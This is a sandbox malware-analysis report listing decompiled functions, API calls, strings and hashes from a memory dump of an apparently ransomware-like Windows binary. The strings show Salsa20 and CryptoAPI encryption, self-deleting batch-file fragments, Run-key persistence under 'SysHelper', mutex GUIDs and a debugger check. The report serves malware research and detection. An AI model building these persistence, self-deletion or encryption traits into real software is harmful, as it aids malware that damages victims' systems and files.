Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Message$FileFindNamePathPeek_memmove$Dispatch
String ID:
API String ID: 273148273-0
Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9

Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON

Download Yara Rule

APIs

PathAppendW.SHLWAPI(?,?), ref: 0040FBD5
_memmove.LIBCMT ref: 0040FC3C
PathFileExistsW.SHLWAPI(?,?,?,?), ref: 0040FC63
_malloc.LIBCMT ref: 0040FC72
lstrcpyW.KERNEL32(00000000,?), ref: 0040FC8C
lstrcatW.KERNEL32(00000000,?), ref: 0040FCA5
_free.LIBCMT ref: 0040FCD7

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
String ID:
API String ID: 3232302685-0
Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 004382B9
_wcscmp.LIBCMT ref: 004382CA
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310

Strings

ACP, xrefs: 004382B3
OCP, xrefs: 004382C4

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

APIs

__wassert.LIBCMT ref: 0040C09A

Strings

input != nullptr && output != nullptr, xrefs: 0040C095
e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: __wassert
String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
API String ID: 3993402318-1975116136
Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042419D
IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252

Strings

i;B, xrefs: 00424168

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: DebuggerPresent_memset
String ID: i;B
API String ID: 2328436684-472376889
Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59

Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 00411190
CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528

Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928

Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Crypt$ContextDestroyHashRelease
String ID:
API String ID: 3989222877-0
Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88

Function 004278D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
GetLastError.KERNEL32 ref: 00412509
CloseHandle.KERNEL32 ref: 0041251C
CloseHandle.KERNEL32 ref: 00412539
CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

TEMP, xrefs: 004125DF
D, xrefs: 00412720
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
@echo off:trydel ", xrefs: 0041262A
"if exist ", xrefs: 00412648
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
delself.bat, xrefs: 0041261C
" goto try, xrefs: 00412666
del ", xrefs: 00412674

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Function 0041BAE0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 320windowCOMMON

Download Yara Rule

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Strings

pU, xrefs: 0041BE9E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID: pU
API String ID: 3873257347-897878559
Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

-----END , xrefs: 0046382F, 00463940, 004639E4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21
-----BEGIN , xrefs: 004636A4
, xrefs: 00463A90

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Function 004270A5 Relevance: 18.3, APIs: 12, Instructions: 289COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0042708B
DecodePointer.KERNEL32(?,?,?,?,000000FF,?,?,00463083,?,00000000,00000000), ref: 004271FE
DecodePointer.KERNEL32(?,?), ref: 0042722A
DecodePointer.KERNEL32(?,?), ref: 0042724F
__aulldvrm.LIBCMT ref: 00427385
_write_multi_char.LIBCMT ref: 00427477
_write_string.LIBCMT ref: 004274A0
_write_multi_char.LIBCMT ref: 004274C2
__cftof.LIBCMT ref: 00427500
_write_string.LIBCMT ref: 00427531
_write_string.LIBCMT ref: 0042756B
_write_multi_char.LIBCMT ref: 00427592
_free.LIBCMT ref: 004275AB

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
String ID:
API String ID: 559064418-0
Opcode ID: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
Instruction ID: 14f77054e820437d32f524f0a61f308f331f5c30c1a6e174fa9440fd564cd740
Opcode Fuzzy Hash: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
Instruction Fuzzy Hash: B8B1A171E092399FDF209B54EC88BAAB7B5EF54314F5400DAD908A6251D7389E80CF59

Function 00427B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00427B29
_free.LIBCMT ref: 00427B42

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

_free.LIBCMT ref: 00427B55
_free.LIBCMT ref: 00427B73
_free.LIBCMT ref: 00427B85
_free.LIBCMT ref: 00427B96
_free.LIBCMT ref: 00427BA1
_free.LIBCMT ref: 00427BC5
EncodePointer.KERNEL32(00558248), ref: 00427BCC
_free.LIBCMT ref: 00427BE1
_free.LIBCMT ref: 00427BF7
_free.LIBCMT ref: 00427C1F

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

Service-0x, xrefs: 00454A80
_OPENSSL_isservice, xrefs: 004549D1

Memory Dump Source

Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_E609.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
